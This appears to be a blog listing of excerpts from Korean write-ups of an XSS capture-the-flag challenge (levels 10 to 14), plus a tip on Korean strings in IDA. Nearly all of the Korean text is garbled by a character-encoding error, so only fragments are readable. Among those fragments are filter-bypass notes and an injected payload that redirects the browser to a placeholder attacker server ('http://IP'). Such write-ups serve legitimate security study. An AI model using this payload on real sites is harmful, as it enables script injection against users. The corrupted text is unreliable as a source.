14λ¨κ³λΆν°λ μ‘°κΈμ© λμ΄λκ° μ¬λΌκ°λ κ²μΌλ‘ 보μ λλ€. λ©μΈ νμ΄μ§μλ λ€μ μ¬νν λμμΈμ κ°μ§κ³ μκΈ°μ μμ€λ₯Ό 보면μ λΆμμ ν΄λ³΄λλ‘ νκ² μ΅λλ€. 보μ΄λ ν¬μΈνΈκ° λ± 2κ³³μ΄ νμΈλ©λλ€. 첫λ²μ§Έλ analytics.js.js λΆλΆκ³Ό try_harder λ³μμ λλ€. μ€ν¬λ‘€ μ μΌ νλ¨μΌλ‘ λ΄λ €λ³΄λ©΄ analytics.js νμΌμ΄ νλ λ μ‘΄μ¬ν©λλ€. 3λ²μ§Έ μ€μ analytics.js.jsλ μ ν¨νμ§ μμ κ²½λ‘μ΄λ©° μ€ν¬λ‘€ μ μΌ νλ¨μλ μ ν¨ν κ²½λ‘κ° μ λ ₯λμ΄ μμ΅λλ€. μ λ ₯νκ³ μ νλ νλΌλ―Έν°μ κ°μ λͺ¨λ μ κ±°ν΄λ³΄λ©΄ srcμ λΆμ¬λ κ²½λ‘λ μ κ±°λμ΄ μμ§λ§. jsλ κ³ μ μ μΌλ‘ λ¨μ μμ΅λλ€. μ λ ₯ κ° κ²μ¦μ μ΄λ»κ² μ§νλλ νμΈν΄λ³΄λ©΄ κ΅μ₯ν νμ΄νΈνκ² κ²μ¦νκ³ μμ΄ μμ μλ°μ€ν¬λ¦½νΈ ꡬ문μ μ½μ νμ¬ μ€νμν¬..
κ°μ’ μ ν리μΌμ΄μ μ λΆμνκ±°λ μ§λ¨ν λ νΉμ ν¨μλ₯Ό μΆμΈ‘νμ¬ νΈλ μ΄μ€ νκ±°λ λ¬Έμμ΄ κ²μμ ν΅ν΄ ν¬μΈνΈλ₯Ό μ°ΎμμΌ λ©λλ€. νμ§λ§ κ΅λ΄μμ κ°λ°λ μ νμ μ΄μ©νλ€ λ³΄λ©΄ λλΆλΆμ΄ "νκΈ"λ‘ μ΄λ£¨μ΄μ Έ μκΈ° λλ¬Έμ IDAμ μ μ¬ν Ghidraμμλ νκΈμ ν΅ν λ¬Έμμ΄ κ²μμ΄ λμ§ μμ΅λλ€. μ΄λ΄ λλ IDAμ κΈ°λ₯μ μ΄μ©νλ©΄ λ³΄λ€ μμνκ² νμν μ μμ΅λλ€. λ§μ½ IDA 7.0 μ΄νμ λ²μ μ μ¬μ© μ€μ΄μλΌλ©΄ νκΈ νμ±μ κ°λ₯νκ²λ 컬μ²νμΌ(.clt)μ μΆκ°ν΄μ€μΌ λ©λλ€. μΆκ° λ°©λ²μ μλμ λ§ν¬λ₯Ό ν΅ν΄ μ§νν΄μ£Όμλ©΄ λ©λλ€. http://egloos.zum.com/shadowxx/v/11310107 ida νκΈ string (character) μ λλ‘ μ½μ΄μ€κ² λ§λ€κΈ°. μμ¦ νλ‘κ·Έλ¨ λλ²κΉ μ°¨μμμ λͺκ°μ§ ν ..
13λ¨κ³ λ©μΈ νμ΄μ§λ₯Ό νμΈν΄λ³΄λ©΄ μ λ¨κ³μ μ μ¬ν λμμΈμ κ°μ§κ³ μμΌλ©°, 12λ¨κ³μμ μ¬μ©λ Payloadκ° λμν μλ λμνμ§ μμ μλ μλ€λ λ΄μ©μ΄ λ΄κ²¨μμ΅λλ€. μ κ° μ¬μ©νλ Payloadλ λμνμ§ μμμΌλ―λ‘ μ½λλ₯Ό μ΄ν΄λ³΄κ² μ΅λλ€. λμΌνκ² νκ·Έλ₯Ό ν΅ν΄ untrusted λλ©μΈμ΄ μ μΈλμ΄ μμ΅λλ€. μ€ν¬λ‘€μ΄ λ무 λ¨μ λ°μΌλ‘ λ΄λ €λ³΄λ ` (λ°± μΏΌν°)λ₯Ό μ¬μ©ν΄μ£Όλ©΄ νμ μ°½μ 무리 μμ΄ λμΈ μ μμ§λ§ λκ° λ€λ₯Έ λ°©μμ ν΅ν΄ m λ³μμ μ μΈλ "Good Luck!"μ λμμ£Όκ³ μΆμ΅λλ€. () Bypass κΈ°λ³Έμ μΌλ‘ " () " κ΄νΈ νν°λ§μ μ°ν κΈ°λ²μ " `(Back Quote)" λ‘ λ§μ΄ μ¬μ©νμ§λ§ μ΄ λ°©λ² μ΄μΈμ μλμ κ°μ 2κ°μ§ μμ±μ μ΄μ©ν΄ κ΄νΈ μ¬μ©μ νΌν μ μμ΅λλ€. 1. Con..
12λ¨κ³λ λ€μ λ€λ₯Έ λͺ¨μ΅μ νμ΄μ§λ‘ νμΈλ©λλ€. μμ€μ½λλ₯Ό λ¨Όμ 보면μ ν΄κ²°ν΄λκ° λ³΄λλ‘ νκ² μ΅λλ€. μ΄μ λ¨κ³μμλ μλ°μ€ν¬λ¦½νΈμ μ μΈλ λ³μλ₯Ό νμ©ν΄μ νμ μ°½μ λμ λλΌλ©΄ μ΄μ λ μ νκ·Έμ λΆμ¬λ μ£Όμλ₯Ό νμ©νμ¬ ν΄κ²°ν΄μΌ λλ λ¬Έμ μΈ κ² κ°μ΅λλ€. src="" μμ±μ λΆμ¬λ untrusted νμ΄μ§λ‘ μ΄λν΄λ³΄κ² μ΅λλ€. untrusted.so.co.il νμ΄μ§λ μ΄μ λ¨κ³μμ 보μ¬μ‘λ νμ΄μ§λ€μ²λΌ λ€μ μ¬νν νλ©΄μ λμ°κ³ μμ΅λλ€. ν΄λΉ νμ΄μ§ μμ€μ½λλ₯Ό νμΈν΄ λ³΄κ² μ΅λλ€. μμμλΆν° νμΈν΄λ³΄μλ©΄ λ³μ mμλ 'Good Luck!' String λ¬Έμμ΄μ΄ μ μΈλμ΄ μμΌλ©°. php? p=μ μ λ ₯λ Payloadλ 12λ²μ§Έ μ€μ a λ³μμ 'Payload'; ννλ‘ μ½μ λκ³ μμ΅λλ€. κΈ°λ³Έμ μΌλ‘ " ';..
λ 벨 11λ¨κ³λ₯Ό 보μλ©΄ λΉκ΅μ μ¬νν νμ΄μ§ ꡬμ±μΌλ‘ λμ΄ μμ΅λλ€. μ°μ μμ€μ½λ λ¨Όμ 보λλ‘ νκ² μ΅λλ€. μ΄λ²μλ λ€μ 볡μ‘ν μ½λλ€λ‘ ꡬμ±λμ΄ μμ΅λλ€. .php?p=μ μ λ ₯λ Payloadλ "a"λΌλ λ³μμ λ΄κΈ°κ² λ©λλ€. 11λ¨κ³μμλΆν°λ μ€ν κ°λ₯ν μ λ ₯ κ° μ΄μΈμλ λͺ¨λ μμΈμ²λ¦¬λ₯Ό μ§ννκ³ μμ΄ λ³λμ λΈλ‘ νλ©΄μ΄ λνλκ² λ©λλ€. μ΄λ¬Έμ λ₯Ό νΈμ λΆλ€μ μ "Hacking attempt" νλ©΄μ μμ λ² λ΄€μ κ²μ΄λΌ μκ°ν©λλ€... μ λ ν΄κ²°νκΈ° μν΄ μ¬λ¬ κΈ°λ²λ€μ Bofore Afterλ₯Ό λΆμνλλ° λμ ν¬ μ€νκ°λ₯ν ꡬ문μ λͺ» μ°Ύμμ΅λλ€.. ννΈλΌκ³ λ μ‘΄μ¬νμ§ μλ μ±λ¦°μ§κΈ° λλ¬Έμ νμ°Έμ ν€λ§€λ€κ° security.stackexchange.comμμ μ°μ°ν ν΄κ²°λ²μ νμΈνμ΅λλ€. κ²°λ‘ μ μΌλ‘ ..
level 10λ¨κ³λ₯Ό μ§ννκ² μ΅λλ€. νλ©΄μ 보μ΄λ νλ©΄μ μ΄μ κ³Ό μ μ¬ν λͺ¨μ΅μ λμ°κ³ μμ΅λλ€. λ΄λΆ μ½λλ₯Ό λ¨Όμ μ΄ν΄λ³΄λλ‘ νκ² μ΅λλ€. 10λ¨κ³μμλ aμ bλΌλ λ³μμ κ°μ΄ μ μΈλμ΄ μλ μνμ λλ€. μ°λ¦¬κ° μ λ ₯ν Payloadλ "a" λ³μμ λ΄κΈ°λλ‘ λμ΄μλλ° document.write μμ±μ ν΅ν΄ κ°μ΄ μ€νλλ κ²μ λ³΄μ€ μ μμ΅λλ€. document.write()μ κΈ°λ₯μ Document Objectμ ν¨μλ‘ μΈμ κ°μ μΉ λΈλ¬μ°μ νλ©΄μ ν μ€νΈ νμμΌλ‘ μΆλ ₯ν΄μ£Όλ κΈ°λ₯μ κ°μ§κ³ μμ΅λλ€. ';{document.location.href="http://IP"}// 9λ¨κ³μμ μ§νν λ°©λ²λλ‘ aλ³μλ₯Ό λ«μ λ§λ¬΄λ¦¬(;)ν΄μ£Όκ³ 곡격μ μλ²λ₯Ό λ‘λμμΌ μ€ν¬λ¦½νΈκ° μ€νλλλ‘ ν΄μ£Όλ©΄ λ κ² κ°μ΅λλ€. λ€..
νλμ μ¬λ¦¬μ§ λͺ»νλ XSS μ±λ¦°μ§λ₯Ό μ€λλ§μ λ€μ νκ² λμμ΅λλ€. μ κ° μ¬λ―Έμκ² νκ³ μλ Alexander Korznikovμ XSS μ±λ¦°μ§μ μ₯μ μ κΈ°μ‘΄μ XSS κ²μκ³Όλ λ€λ₯΄κ² νν λ²μ μ¬λ¦° μ¬λλ€μ΄ λ§μ΄ μμΌλ©°(κ΅λ΄μμλ λ³Έ μ μ΄ μλ€μ..) μΆμ μμ μλλ₯Ό μμμ νμ νκ³ μΌλ§μ ννΈ μμ΄ κ³΅λ΅ νλ€λ μ μμ λμ± μ μ°©μ΄ κ°κ³ λͺ°μ μ΄ λλ κ±° κ°μ΅λλ€. κ³΅λ΅ νμ΄μ§λ κ΅μ₯ν μ¬νν©λλ€. Reflected λ°©μμΌλ‘ νλΌλ―Έν°μ μ μ ν Payloadκ° μ½μ λ κ²½μ° λ€μ΄μΌλ‘κ·Έ νμ μ°½μ λμ°μ€ μ μμ΅λλ€. μ΄μ λ¨κ³(8-1) μ μμ€μ μ μ¬ν ννμ μ½λλ₯Ό κ°μ§κ³ μμ΅λλ€. bλΌλ λ³μμλ "1"μ΄ μ μΈλμ΄ μκ³ if 쑰건문μ ν΅ν΄ μ€ν¬λ¦½νΈκ° μ€νλ μ μλλ‘ κ΅¬λ¬Έμ μμ±μμΌμΌ λ©λλ€. bμ λ³μ..